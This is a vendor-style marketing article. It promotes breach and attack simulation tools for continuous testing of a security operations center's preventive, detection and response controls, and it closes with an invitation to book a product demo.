Recent years have seen the data security industry move from periodic, point-in-time data security decisions, to a more fluid and ongoing approach to data security frameworks, as outlined in Gartner’s CARTA model. Echoing this approach, breach and attack simulation (BAS) tools have emerged to offer organizations automated, continuous security effectiveness testing.
Complementing periodic point-in-time assessments and exercises such as pen tests and red teaming, continuous security testing is the practice of challenging, measuring and optimizing the effectiveness of security controls on an ongoing basis, so that security gaps can be uncovered as soon as they emerge and quickly be fixed.
Gaining Back the Advantage of Time
According to a recent poll, when it comes to testing security controls, most organizations test on a quarterly basis at best. However, IT environments change frequently, new malware strains are released daily, and malware techniques continue to evolve. All this makes the point-in-time snapshots produced by these assessments limited in value, as they cannot provide visibility into an organization’s true, real time security posture.
By proactively challenging and testing controls before the bad guys do, organizations can start to take back the advantage of time. Instead of waiting for the next pen test or red team exercise to find out how effective their security controls are, practitioners can get the 24x7x365 visibility they need to gain the upper hand.
To this end, security testing should be part of everyday activities, and empower security operation center (SOC) analysts to continually reduce their organization’s attack surface.
How BAS Enhances Your SOC
Much like crash testing a car, the only way to know the strength of your controls is to test them, and then take the appropriate corrective steps.
By integrating BAS into their current infrastructure, SOC teams can:
- Assess effectiveness of preventative controls – Are your email gateway and sandbox effective at identifying and blocking risky emails with suspicious attachments? Does your web gateway prevent access to malicious websites? Are your IPS and AV effective?
- Assess effectiveness of detection controls – Are behavior-based detection tools doing their job by identifying risky activities, such as unusual PowerShell commands or questionable connections to command & control servers? This is relevant for tools such as EDRs, EUBA and deception honeypots, among other machine learning engines.
- Assess effectiveness of post-breach controls – If a system in your network is compromised, can further damage be avoided? Can your firewall and infrastructure settings block lateral movement? Will your DLP block stealthy attempts to exfiltrate sensitive data outside of your network, for example using steganography and other methods?
- Assess effectiveness of the monitoring and response workflows – Are alerts and follow up actions clear to your incident response staff? Are there playbooks in your SOAR solution that should be refined?
- Compare security product effectiveness – How do you select among comparable security products objectively? By performing the same set of attack simulations on similar products, you can determine which one is stronger based on vendor-agnostic empirical data.
- Gain automated reporting and metrics – Until recently, objectively reporting on your security’s performance was largely impossible. BAS platforms can be leveraged to automatically deliver executive and technical-level briefs, and the latter can be integrated into your SIEM or other controls. Benchmarking against industry peers can help you understand your cyber stance, and exposure scores monitored over time can help demonstrate effective spending.
- Prioritize mitigation efforts – BAS helps teams prioritize remediation efforts, by showing practitioners where their risk exposure score is highest. By tackling the highest risk gaps first, practitioners can allocate their time and resources according to where they would have the most impact.
Ensure defensibility against latest threats – New APT, ransomware and Trojan variants emerge weekly, sporting new indicators of compromise (IoCs) and evolving techniques. By continually challenging controls against simulations of these strains, security teams can defend against these attacks faster—and thus shrink the window of opportunity for the bad guys.
The Bottom Line
Prevention, detection and remediation controls can be enhanced using BAS-generated insights.
As SIEM and SOAR platforms serve as the heart of the SOC, validating that they are picking up events and alerts is vital to ensuring their effectiveness along with refining the incident-response playbooks defined in the SOAR. In addition, security teams can enrich their current SIEM and SOAR solutions by utilizing BAS-generated data fed via API.
In a similar vein, cyber exposure data uncovered by vulnerability management solutions can be pulled into attack simulation data to better prioritize and accelerate remediation. By leveraging the automated testing, reporting and alerting of BAS solutions, you can continually reduce your attack surface and best position yourself to defend against sophisticated cyberattacks, while improving cyber security ROI, cross-team communication and management buy-in.
To get started with Gartner-recognized, award-wining BAS technology, sign up for a live demo today.